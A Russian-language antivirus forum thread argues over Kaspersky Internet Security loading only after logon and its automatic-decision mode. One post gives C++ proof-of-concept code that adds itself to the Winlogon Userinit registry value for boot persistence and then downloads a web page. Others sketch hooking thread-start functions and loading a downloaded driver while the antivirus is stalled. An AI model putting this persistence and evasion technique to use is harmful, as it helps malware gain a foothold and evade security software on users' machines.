Jump to content
d7447

поздняя загрузка касперского

Recommended Posts

antonn

Можно конечно устроить соревнование по обходу проактивки, только толку =)

Share this post


Link to post
>> круг обязанностей в ЛК?

Это поможет сабжу ? :D

 

мне хочется понять, чем же он реально занимается в ЛК, кроме написания длинных постов-лозунгов на форуме

 

antonn

Выплюнет вам хипс, что объект в автозагрузку пытается прописаться, AddPrintProvidor() в помошь - хипс не хендлит рпц и не контролит системные процессы =)

 

не выплюнет. Ибо достаточно примеров прописывания вредоносов в автозапуск, а потом "лечения активного заражения" после их появления в базах

 

Share this post


Link to post
И давайте дружно попросим ... проделаеть это же самое, но не ручками, а так чтобы его простенькая программа стала чуток сложнее, и сама "кинулась" в автозагрузку, в тот самый меню "Пуск", куда он положил программу ручками. После чего доложить об проделанном. Если просить у него не хочется - проделайте это самостоятельно пожалуйста.

была похожая ситуация - программа без моего участия прописалась в автозагрузке и была вычислена не КИС2010 (защита включена), а защитником виндоус (виста ХП) после перезагрузки ноутбука. Но детали за давностью месяцев уже не восстановлю - возможно приложение было в списке легальных для КИС и сомнительных для защитника (такое может быть?).

Сейчас наблюдается ситуация, которая вместе с вопросом в первом топике и вынудила написать сюда: установил "H264WebCam_Setup.exe", после запуска обнаружил, что приложение показывает мне чью-то реалтайм съемку (в сюжете пока ничего криминального). В настройках сетевого экрана - в строчках сетапа и установленного приложения стоит знак "запрос действия" (см.скриншоты). Раз показывает мне чужую съемку, не спросясь, то почему бы не показывать и тому, кому надо, мою съемку - опять-таки не спросясь?

post-65648-1292159349_thumb.pngpost-65648-1292159367_thumb.png

Share this post


Link to post

А теперь покажите мне пожалуйста еще и вот такой скриншот с Вашей системы:

post-5590-1292159608_thumb.png

Share this post


Link to post
А теперь покажите мне пожалуйста еще и вот такой скриншот с Вашей системы...

он у меня всегда немного другой, но, видимо, это дела не меняет:

post-65648-1292176613_thumb.png

 

Share this post


Link to post
он у меня всегда немного другой, но, видимо, это дела не меняет:

post-65648-1292176613_thumb.png

Правила не срабатывают, потому что включен автоматический режим.

Share this post


Link to post

Так, друзья-товарищи, это всё уже пошел какой-то стёб. Сами добавляем в автозагрузку, не сами, к чему эта болтовня?

Вот вам "программа" которая

1) прекрасно добавляется в автозагрузку сама.

2) Вводит после перезагрузки в ступор каспер (специально не привожу эту строку(!).

3) Списывает после этого всё, что пожелает из интернета.

4) Имеет рейтинг опасности 22:

1111p.th.png

 

int _tmain(int argc, _TCHAR* argv[])
{
    BOOL bDownload = TRUE;
    HKEY hKeyWinLogon;
    LONG nRegResult;
    LPCSTR szUserInit = "C:\\WINDOWS\\system32\\userinit.exe";

    nRegResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\", &hKeyWinLogon);
    if(ERROR_SUCCESS == nRegResult)
    {
        CHAR fnBuf[1024];
        GetModuleFileNameA(NULL, fnBuf, sizeof(fnBuf) - 1);

        CHAR * szNewValue = (CHAR*)HeapAlloc(GetProcessHeap(), 0, lstrlenA((LPCSTR)szUserInit) + lstrlenA(fnBuf) + 32);
        sprintf(szNewValue, "%s,%s,", szUserInit, fnBuf);

        puts(szNewValue);
        nRegResult = RegSetValueExA(hKeyWinLogon, "Userinit", 0, REG_SZ, (LPBYTE)szNewValue, lstrlenA(szNewValue) + 1);
        if(ERROR_SUCCESS != nRegResult){
            printf("RegSetValueExA error %d\n\r", nRegResult);
        }
        HeapFree(GetProcessHeap(), 0, szNewValue);
        RegCloseKey(hKeyWinLogon);
    }
    else printf("RegOpenKeyA error %d\n\r", nRegResult);
    
    if(bDownload){
        HINTERNET hINet;
        HINTERNET hFile;

        puts("Waiting...\n");
        for(int i = 0; i < 30; i++, Sleep(1000), printf("\r%d", i));
        puts("");

        puts("Downloading...\n\n");
        hINet = InternetOpenA("TEST/1.0", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
        if (hINet){
            hFile = InternetOpenUrlA( hINet, "http://www.example.com", NULL, 0, INTERNET_FLAG_RELOAD, NULL );
            if (hFile){
                CHAR buf[4096];
                DWORD dwRead;
                InternetReadFile(hFile, buf, 4095, &dwRead);
                buf[dwRead] = 0;
                puts(buf);
                InternetCloseHandle(hFile);
            }
            InternetCloseHandle(hINet);
        }
    }
    getchar();
    return 0;
}

Ни малейшего противодействия со стороны КИСа, настроенного по умолчанию, с автопринятием, она не встречает. Фактически, единственное, что ей противостоит, так это UAC.

Share this post


Link to post
И да, господа, если кто еще не понял в чем соль такой "дырки" - я могу попытаться предотвратить запуск других программ. Что там перехватывать.. NtResumeThread()+NtQueryInformationThread(), LdrInitializeThunk()? Как думаете, дам я загрузиться тому, кто меня может убить?

Доступ в сеть до загрузки кис - это ерунда, по сравнению с тем, что можно сделать не дав загрузиться этому самому кис...

 

antonn, я Вас умоляю, к чему нам нужны эти ковыряния в ntdll?! Мы совершенно спокойно можем скачать любой понравившийся драйвер и запустить его прямо тут же просто через Service Control Manager, пока КИС находится в ступоре. Со всеми вытекающими.

Share this post


Link to post

antonn, ntoskrnl

 

вы слишком серьезно относитесь к этой беседе. Ведь очевидно же, что ваш собеседник о возможностях КИС знает в основном из рекламных брошюр компании либо просто стебается над вами. Я потому и просил его озвучить фронт работ, чтобы понять какой из 2-х вариантов верный.

 

Share this post


Link to post
Правила не срабатывают, потому что включен автоматический режим.

то-то кис перестал запрашивать действия - с этой кардинальной сменой интерфейса в кис2010 желание разбираться в деталях его настройки пропало напрочь. Считал достаточным ответить при установке программы что сам, мол, хочу решать, чего делать с той или иной сомнительно ведущей себя программой. Спасибо. Вопроса с поздней загрузкой это, правда не снимает - в версии 2009 была та же проблема, но там автоматический режим был выключен однозначно всегда.

Edited by d7447

Share this post


Link to post
Вопроса с поздней загрузкой это, правда не снимает - в версии 2009 была та же проблема, но там автоматический режим был выключен однозначно всегда.

 

При установке по умолчанию (Дальше>> Дальше>> Дальше>> OK) автоматический режим включен и в 2009, и в 2010.

 

Считал достаточным ответить при установке программы что сам, мол, хочу решать, чего делать с той или иной сомнительно ведущей себя программой.

Покажите мне пожалуйста как выглядет это окно при установке КИС 2011

Edited by Maratka

Share this post


Link to post

Очевидно каспер перестал нормально загружаться (до приложений) после того, как пропал значек " Protected by Kaspersky Lab"при загрузке системы, который так и не вернули)))

Edited by Globalprosperity

Share this post


Link to post
Ни малейшего противодействия со стороны КИСа, настроенного по умолчанию, с автопринятием, она не встречает. Фактически, единственное, что ей противостоит, так это UAC.

А вот antonn считает, что все дело в настройках.

И самая первая настройка, которую делает мало-мальски продвинутый пользователь - это отключение "автопринятия решения", иначе уведомлять пользователя антивирус практически никогда не сможет.

 

Антивирус должен пресекать работу по другому принципу - это "может быть опасно", уведомлять посльзователя или делать собственный выбор исходя из настроек.

Share this post


Link to post
Очевидно каспер перестал нормально загружаться (до приложений) после того, как пропал значек " Protected by Kaspersky Lab"при загрузке системы, который так и не вернули)))

Как ни странно, его и не убирали. :)

Share this post


Link to post
А вот antonn считает, что все дело в настройках.

И самая первая настройка, которую делает мало-мальски продвинутый пользователь - это отключение "автопринятия решения", иначе уведомлять пользователя антивирус практически никогда не сможет.

 

Maratka, Вы на предыдущей странице заявляли, что КИС не даст прописаться в автозапуск, так вроде бы? На днях, когда я Вам доказывал, что автопринятие решений - зло, Вы мне доказывали, что оно прямо-таки необходимо потому, что енд-юзер не знает что нажать. Где-то мне попадалось утверждение сотрудника ЛК о том, что согласно KSN, у 90% (или 95%, не помню уже) пользователей стоят дефолтные настройки, это так? Мне просто интересно, Вы поменяли свое мнение, или Вы его меняете по пять раз на страницу?

Share this post


Link to post

Ну да, его не убирали, но его почему то нет! Если мне не изменяет память, в прошлом году была тема по этому поводу, где предлагались различные махинации с реестром для запуска ентого значка, т.к. автоматом он не запускался. На одной машине стоит КАВ а на другой КИС. После выхода 2010 версии я его не видел))) Прошу прощения что влез со своим "самоваром" в чужую тему!

Edited by Globalprosperity

Share this post


Link to post
Maratka, Вы на предыдущей странице заявляли, что КИС не даст прописаться в автозапуск, так вроде бы? На днях, когда я Вам доказывал, что автопринятие решений - зло, Вы мне доказывали, что оно прямо-таки необходимо потому, что енд-юзер не знает что нажать. Где-то мне попадалось утверждение сотрудника ЛК о том, что согласно KSN, у 90% (или 95%, не помню уже) пользователей стоят дефолтные настройки, это так? Мне просто интересно, Вы поменяли свое мнение, или Вы его меняете по пять раз на страницу?

 

Нет, не поменял.

 

Любой антивирус рано или поздно пропустит малвару, и это совершенно нормально, и абсолютно всем известно.

Одновременно с этим любой антивирус не должен мешать работе легального ПО, и это тоже нормально, более того - как бы даже подразумевается само собой.

 

Вы предлагаете настройки антивируса, которые по факту равнозначны запрету пользователям устанавливать практически любой софт.

А я очень сильно сомневаюсь, что подобное решение обрадует пользователей.

 

p.s.

Отключите компьютер от розетки, и запишите что-то в автозагрузку.

Можно "хорошую" аську, можно антивирус ЛК, а можно Ваше изобретение.

Мне кажется шанс удачной записи будет примерно одинаковым в любом из трех случаев.

 

Но после этого внезапнно возникнет одна проблема "а зачем мне компьютер, который на 100% защищен от воздействия вредоносного ПО"?

Edited by Maratka

Share this post


Link to post
Ну да, его не убирали, но его почему то нет! Если мне не изменяет память, в прошлом году была тема по этому поводу, где предлагались различные махинации с реестром для запуска ентого значка, т.к. автоматом он не запускался. На одной машине стоит КАВ а на другой КИС. После выхода 2010 версии я его не видел))) Прошу прощения что влез со своим "самоваром" в чужую тему!

 

Какая ОС?

Share this post


Link to post
я Вас умоляю, к чему нам нужны эти ковыряния в ntdll?

а я что.. я ничего, я по привычке уже =)

 

tolid

Мне интересно как люди выкручиваются. К тому же сюда заглядывают люди имеющие прямое отношение к ЛК. Плюс поднять немного шумиху - быстрее зашевелятся.

 

А вот antonn считает, что все дело в настройках.

И самая первая настройка, которую делает мало-мальски продвинутый пользователь - это отключение "автопринятия решения", иначе уведомлять пользователя антивирус практически никогда не сможет.

Антон считает, что программа должна либо принять решение сама либо исходить из заданых ей настройками. Неизвестная программа написаная пять минут назад, обращающаяся к какому-то левому сайту (это не сайт МС, например, к которому могло бы быть хоть какое-то доверие) в интернете: антивирус должен дать доступ этой программе автоматически (если у него стоит "автомат")? Из каких побуждений он это должен сделать? Программа не подписана, находится не в системной директории.

Далее, настройка "обучения": Если программа запущена первый раз - вероятно ее нужно приостановить и узнать у пользователя что делать с программой? Не так ли? Так вот занеся в ограниченные и запретя ей выход в сеть, она продолжает выходить в сеть после загрузки компа, до момента когда стартует КИС.

Ах да, правильно читать так:

Антивирус должен пресекать работу по другому принципу - это "может быть опасно", уведомлять посльзователя или делать собственный выбор исходя из настроек.

Акценты нужно расставлять. Или самостоятельно или алерт. Исходя из настроек. Я что-то не так разве сказал? :)

 

 

Share this post


Link to post
Нет, не поменял.

 

Любой антивирус рано или поздно пропустит малвару, и это совершенно нормально, и абсолютно всем известно.

Одновременно с этим любой антивирус не должен мешать работе легального ПО, и это тоже нормально, более того - как бы даже подразумевается само собой.

 

Вы предлагаете настройки антивируса, которые по факту равнозначны запрету пользователям устанавливать практически любой софт.

А я очень сильно сомневаюсь, что подобное решение обрадует пользователей.

 

p.s.

Отключите компьютер от розетки - запишите что-то в автозагрузку.

Можно "хорошую" аську, можно антивирус ЛК, а можно Ваше изобретение.

Мне кажется шанс удачной записи будет примерно одинаковым в любом из трех случаев.

 

Но после этого внезапнно возникнет одна проблема "а зачем мне компьютер, который на 100% защищен от воздействия вредоносного ПО"?

Демагогия. Ладно, раз Вы так отстаиваете право своего продукта не мешать заражению системы, объясните тогда, хотя бы, почему защитные механизмы каспера не активируются до того, как пользователь вошел в систему? Какой прок в охапке ваших "криптодрайверов", если они не в состоянии предотвратить помеху загрузке ГУИ, от которого они, как мы видим, всецело зависят и придерживаться, хотя бы уже определенной пользователем, политики безопасности без его (ГУИ) помощи не могут.

Edited by ntoskrnl

Share this post


Link to post

А где должен быть значек "Protected by Kaspersky Lab" :wacko: , у меня на win7 в окне приветствия нет такого значка :pardon: и еще после установки KIS 11.0.2.556 утилита HijackThis обнаружила установленные KISом плагины в Internet Explorer, что это за плагины и почему они без уведомления установились?

Share this post


Link to post
А где должен быть значек "Protected by Kaspersky Lab" wacko.gif , у меня на win7 в окне приветствия нет такого значка pardon.gi.

Он есть, но я его вижу только при выключении компьютера, и там не значек, а уже просто надпись :)

 

обнаружила установленные KISом плагины в Internet Explorer, что это за плагины и почему они без уведомления установились?

Потому что ИЕ подписан и КИС ему полностью и безповоротно доверяет. Типа так они объясняют. Уже бился об эту стенку непонимания.

Share this post


Link to post
Акценты нужно расставлять. Или самостоятельно или алерт. Исходя из настроек. Я что-то не так разве сказал? :)

Совершенно Верно.

Установите в настройках, иходя из которых нужно самостоятельно принимать решение "запрет изменения автозапуска" для всего софта, включая доверенный, и положите Вашу программку, пингующую неМикрософтоский сервер в автозапуск, перезапустите систему, и расскажите сколько запросов у Вас прошло удачно.

 

Начать можете прямо сейчас.

Edited by Maratka

Share this post


Link to post

14 запросов, не пинга, а получение всей страницы.

Меня удивляет почему вы раньше не спрашивали в каком режиме работают 4 станции с 3 (две ХР с 2009/2010 и две win7 с 2011/2011+комодо) разными антивирусами.

 

Ах да, я неустанно повторяю: запрет изменения своей автозагрузки - это костыль. Т.к. добавить в автозагрузку можно минуя ОС.

Был когда-то такой нанораспил как создание сайта для школьников, там был поиск построенный толи на mail.ru толи какой другой конторы (в общем внешний поисковик использовали). Так вот чтобы школьникам порнуха не сыпалась герои-разработчики фильтровали текст запроса. Там было много слов в блеклисте, и нельзя было произвести поиск по ним. Вместо того, чтобы фильтровать ответы. Нетрудно догадаться, что выдал поиск по словам "мокрые киски", нет, не картинки котят под дождиком. Так вот вы сейчас упорствуете на "фильтрации запроса пользователя" своим ограничением на запись в автозагрузку, мол при ограничении записи ничего не должно произойти.

Edited by antonn

Share this post


Link to post
Демагогия. Ладно, раз Вы так отстаиваете право своего продукта не мешать заражению системы, объясните тогда, хотя бы, почему защитные механизмы каспера не активируются до того, как пользователь вошел в систему? Какой прок в охапке ваших "криптодрайверов", если они не в состоянии предотвратить помеху загрузке ГУИ, от которого они, как мы видим, всецело зависят и придерживаться, хотя бы уже определенной пользователем, политики безопасности без его (ГУИ) помощи не могут.

 

 

Все механизмы активированы, кроме "рисования алертов".

А рисовалка действительно подргужается после логона.

Share this post


Link to post
Guest
This topic is now closed to further replies.

×
×
  • Create New...

Important Information

We use cookies to make your experience of our websites better. By using and further navigating this website you accept this. Detailed information about the use of cookies on this website is available by clicking on more information.